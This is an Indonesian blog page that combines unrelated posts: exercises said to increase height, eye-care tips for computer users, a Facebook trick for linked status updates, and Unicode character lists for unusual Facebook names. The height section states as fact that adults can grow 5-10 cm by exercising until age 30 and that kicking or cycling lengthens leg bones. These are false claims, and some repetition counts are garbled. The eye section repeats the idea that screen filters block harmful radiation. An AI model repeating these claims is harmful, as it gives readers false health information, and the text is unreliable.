Tapi ,Cara ini membuat tinggi tubuh bertambah 5-10 sentimeter secara alami hingga usia 30 tahun.

Banyak referensi mengatakan pertumbuhan tubuh wanita terhenti di usia 18-21 tahun. Tapi tenang, Anda masih memiliki kesempatan menambah tinggi badan di atas usia itu. Caranya, kombinasikan asupan makanan, latihan fisik, dan tidur teratur hingga usia 30 tahun
Gaya hidup sehat hingga selepas masa remaja, masih memungkinkan seseorang tumbuh paling sedikit 2-4 inci atau 5-10 sentimeter secara alami.

Ada beberapa latihan yang bisa dilakukan untuk memaksimalkan tinggi badan. Lakukan latihan berikut untuk mendorong pertumbuhan, memperpanjang
ulang belakang, meningkatkan fleksibilitas dan memperkuat otot-otot perut:

1. Lari cepat jarak pendek (sprint)
Latihan ini bermanfaat meningkatkan pelepasan hormon pertumbuhan. Penekanan pada otot kaki selama latihan berdampak pada pemanjangan tulang dan otot.

Tetapi jangan terlalu sering melakukannya karena dapat menyebabkan pembengkakan pada otot dan tendon. Sprint dianjurkan pada permukaan alami seperti lantai atau rumput, bukan beton.

2. Menendang
Berdiri dengan kaki lebar dan angkat satu kaki kemudian lakukan tendangan. Ulangi minimal 20 tendangan pada satu kaki dan kemudian beralih ke kaki yang lain. Lakukan latihan ini selama 20 kali, karena dapat memperpanjang tulang kering dan paha.

3. Lompat
Berdirilah di depan bangku atau tangga setinggi kaki. Untuk memulai, lompat dengan satu kaki dalam sepuluh hitungan. Lalu, ulangi dengan kaki lain. Lakukan gerakan melompat hingga tiga kali. Anda bisa beristirahat di sela latihan.

4. Bersepeda
Gerakan mengayuh sepeda membuat jari kaki terus mencapai pedal. Ini merupakan peregangan yang bisa membuat kaki lebih panjang. Lakukanlah selama sekitar 10-15 menit. Anda juga dapat menggunakan sepeda statis atau stationary cycle.

5. Berenang
Olahraga satu ini memang sangat efektif untuk membuat tubuh fit dan lebih fleksibel. Lakukan renang gaya dada dan lakukan minimal 20 menit.




6. Lompat tali
Latihan ini sangat menyenangkan, apalagi jika Anda sambil mendengarkan musik menghentak. Lakukan sebanyak 300 kali setiap hari.

7. Berayun
Gunakan penahan atau ambang pintu yang tinggi. Anda dapat membelinya di toko peralatan olahraga. Awali posisi dengan berdiri lalu biarkan tubuh berayun. Posisi kaki bisa lurus atau ditekuk, buatlah tubuh senyaman mungkin. Lakukan gerakan ini setidaknya 10 kali dalam sehari.

8. Free Hand
Berdirilah tegak dalam ruangan yang luas dan tarik napas dalam-dalam. Angkat tangan letakan di tingkat bahu, lalu dorong tangan sejauh mungkin dan lepaskan napas. Ulangi 8 -10 kali.

Tarik napas dan kembali memosisikan tangan. Lalu, angkat tumit sambil berdiri jinjit, hembuskan napas, ulangi 80-10 kali. Tarik napas dan angkat lengan terentang di atas kepala. Lalu ayunkan ke dalam dengan arah melingkar dan buang napas. Ulangi 80-10 kali.

Pilih latihan yang paling cocok untuk Anda. Tapi harus dilakukan ecara teratur dan konsisten. Cobalah untuk memiliki waktu teratur untuk latihan Anda sehingga Anda dapat merasakan efeknya.




Tips Merawat Mata dari Radiasi Komputer

Akhir akhir ini saya merasa mata ini mulai terasa kabur kalo melihat jauh. Padahal dulunya kalo melihat benda jauh masih sangat jelas. Mungkin ini salah satu efek dari radiasi komputer. Tapi gak bisa ngeluh juga, soalnya dalam pekerjaan sehari hari saya menuntut harus didepan komputer selama berjam jam. Saya merasa anda juga pasti mengalami hal yang sama bukan. Bahkan ada anak tetangga saya umurnya masih 10 tahun tapi sudah pake kacamata memprihatinkan sekali kan makanya kali ini saya akan mencoba untuk membagikan sedikit trik kepada anda semua bagaimana cara merawat mata agar selalu dalam keadaan sehat. Kan sayang kalo masih muda matanya udah empat (pake kacamata).

1. Coba pasang filter pada monitor komputer anda. Filter ini berfungsi untuk menahan radiasi agar tidak sampai ke mata.

2. Pilihlah monitor yang berbentuk LCD/plasma karena monitor ini dipercaya lebih baik daripada monitor yang model lama.Jika anda punya cukup uang,bisa membeli VGA yang bagus agar warna monitor tidak melelahkan mata.

3. Jagalah jarak mata anda dengan monitor komputer idealnya jarak mata ke komputer adalah 30 cm.

4. Taroklah monitor sejajar dengan mata anda.jangan terlalu rendah dan jangan terlalu tinggi.usahakan saat anda melihat komputer rasanya enak dan nyaman.


5. Atur warna pada layar monitor sehingga enak dipandang mata jangan terlalu terang karena dapat menyebabkan mata anda menjadi silau juga jangan terlalu gelap, karena akan menyebabkan mata anda bekerja terlalu keras sehingga membuat mata menjadi cepat kering.
atur screen refresh rate menjadi 75 htz.. Caranya jika anda pakai windows XP klik kanan pada desktop-properties-setting-advanced-monitor-lihat kolom screen refresh rate atur menjadi 75 htz.

6. Sesering mungkin kedipkan mata. Karena dengan kita mengedipkan mata, akan merangsang kelenjar airmata untuk mengeluarkan air mata yang berfungsi membuat mata menjadi basah dan lembab. Jika anda jarang mengedipkan mata, maka mata akan menjadi kering. Jika dipaksakan terus mata akan menjadi sakit dan akhirnya memerah.bila perlu anda bisa membeli obat tetes mata untuk membuat mata selalu dalam keadaan basah.

7. Anda bisa membeli semacam kacamata yang bisa anda pakai pada saat menggunakan computer.

8. Perhatikan cahaya disekitar ruangan tempat anda menggunakan komputer usahakan ruangan cukup pasokan cahaya jangan menggunakan komputer di ruangan yang gelap (tidak cukup cahaya).

9. Setelah penggunaan komputer dalam jangka waktu yang lama, istirahatkan mata minimal 15 menit  anda bisa melihat lihat keluar ruangan untuk menyegarkan mata usahakan untuk melihat objek yang berwarna hijau seperti pepohonan dan daun daunan karena menurut para peneliti, warna hijau mampu membuat mata kembali segar.

10.Perbanyak konsumsi makanan yang menandung vitamin A seperti wortel. Juga rajinlah untuk memeriksakan mata ke dokter mata untuk mengetahui adanya gangguan pada mata.jika mata benar benar sudah terasa tidak enak, jangan malu untuk menggunakan kacamata.


11.Demikian sedikit tips dari saya.semoga setelah anda menerapkan tips ini dapat membuat kesehatan mata anda lebih terjaga.
mulai sekarang sayangilah mata anda.karena ini merupakan anugrah yang diberikan kepada tuhan. Bayangkan jika anda tidak bisa lagi menikmati indahnya alam(wah tidak bisa dibayangkan)harta bisa dicari tapi kesehatan tidak bisa dibeli.
Demikianlah sekedar tips dari saya semoga bisa bermanfaat buat anda

Update Status Biru / Ber-Link di facebook

Pengen Update status biru ??

gampang kok caranya
pertama klik :
http://apps.facebook.com/sekbbcdcaaa/

trus copas aja code berikut :
@[ID KAMU:0:STATUS KAMU]

kalau mau posting ke wall orang lain klik ini :
https://www.facebook.com/connect/prompt_feed.php?preview=true&api_key=118972548183713&target_id=ID TARGET


NB : Update Status nya harus pakai aplikasi Update Status . kalau langsung aja tidak bisa .

Karakter Ter-Unik Ganti Nama di Facebook



Karakter dibawah adalah karakter yang bisa diterima untuk mengganti nama Facebook
alangkah lebih uniknya jika kita mengulang karakter karakter tersebut, namun jika tidak berhasil sebaiknya menggunakan 2 atau 3 karakter
contoh :
ވވވވވވވވވ(satu karakter)
ઉઊ (dua karakter)
dan seterusnya
dan carilah karakter tersebut di Aplikasi Character Map didalam Komputer anda atau langsung aja copas
________________________________________________________

" GAUTAMI "

అ ఆ ఇ ఈ ఉ ఊ ఋ ఌ ఎ ఏ ఐ ఒ ఓ ఔ క ఖ గ ఘ ఙ చ ఛ జ ఝ ఞ ట ఠ డ ఢ ణ త థ ద ధ న ప ఫ బ మ య ర ఱ ల ళ వ శ ష స హా

contoh :
________________________________________________________

"MV boli"

ހށނރބޅކއވމފދތލގޏސޑޒޓޔޕޖޗޘޙޚޛޜޝޞޟޠޡޢޣޤޥ

contoh :
ކއކއކއކއކއކއކއކއކއކއކއކއ
ބބބބބބބބބބބބބބބބބބ
 ހހހހހހހހހހހހހހހހހހހހހހ
ވވވވވވވވވވވވވވވވވވވވވވވވވވވވ

ޥޥޥޥޥޥޥޥޥޥޥޥޥޥޥޥޥޥޥޥޥޥޥޥޥޥޥޥ

 
_________________________________________________________

"Sylfaen" 


ﬗ ﬖ ﬕ ﬔ ﬓ ჵ ჴ ჳ ჱ ჰ წ ძ ც ჩ შ ყ ღ ქ ფ ტ უ ს რ ჟ პ ო ნ ო მ ლ დ լ ի ժ թ ը է զ ե դ գ բ ա

Contoh :
ﬗﬖﬕﬔﬓ

_________________________________________________________

"Shruti "


અ આ ઇ ઈ ઉ ઊ ઋ ઍ એ ઐ ઑ ઓ ઔ ક ખ ગ ઘ ઙ ચ છ જ ઝ ઞ ટ ઠ ડ ઢ ણ ત થ દ ધ ન પ ફ બ ભ મ ય ર લ ળ વ શ ષ સ હ ૧ ૨ ૩ ૪ ૫ ૬ ૭ ૮ ૯
CONTOH :

ઉઊઉઊઉઊઉઊઉઊઉઊઉઊ
ઇઈઇઈઇઈઇઈઇઈઇઈઇઈ
_________________________________________________________

"Kozuka Mincho Pro M"

ぃ あ ぁ ぃ ぅ う ぇ え ぉ お か が き ぎ け げ こ ご さ さ ざ し じ す ず せ ぜ そ ぞ た
だ ち っ ぢ ゑ ゐ わ ゎ ろ れ る り ら よ ょ ゆ ゅ ゃ も め む み ま ぽ ほ ぼ
ぷ ぶ ふ ぴ び ひ ぱ ば は の  ね ぬ に な ど と で て を ん
ゔ ゕ ゖ ゝ ゞ ゟ ァ ア  ィ イ ゥ ウ ェ エ ォ
オ カ キ ガ ヌ ニ ぃ ニ   ナ ド ド ト
テ ヅ ヂ チ ロ レ ル リ ラ ヨ
 ョ ユ ュ ヤ ャ モ
メ ム ミ マ
ポ ボ  ホ
 
 
Contoh

モエとこムウ
ロニロニ
ミロミ
ニロミ
ニニニロニニニ
ニミニミニ
ニ囗ニ囗ニ
ニエニエニ
ニぃニぃニぃニぃニ
ゝミゞ 
_________________________________

" MANGAL " 

अ आ इ ई उ ऊ ऋ ऌ  ऍ ऎ ए ऐ ऑ ऒ ओ औ क ख ग घ ङ च छ  ज झ ञ ट ठ ड  ढ ण त थ द  ध न ऩ प फ ब भ म  य र ऱ ल ळ  ऴ व श ष स  ह ॐ क़ ख़ ग़ ज़ ड़ ढ़ फ़ य़ ॠ ॡ 

contoh :
ळठळठळठळठळठळठळ
ळळळळळळळळळळळळ 
_________________________________

" LATHA " 
 
அ ஆ இ ஈ உ ஊ எ ஏ ஐ ஒ ஓ ஔ க ங ச ஜ 
ஞ ட ண த ந ன ப ம ய ர ற ல ள ழ வ ஷ ஸ
ஹை ௧ ௨ ௩ ௪ ௫ ௬ ௭ ௮ ௯ ௰ ௱ ௲
contoh : 
டப டப
இஇஇஇஇஇஇஇஇ
ஹைஹைஹைஹைஹை 


Sumber: http://cyberfrogteam.blogspot.com/2011/05/karakter-lain-untuk-merubah-nama.html

 
Blog JavaCyber 2012 | All Rights Reserved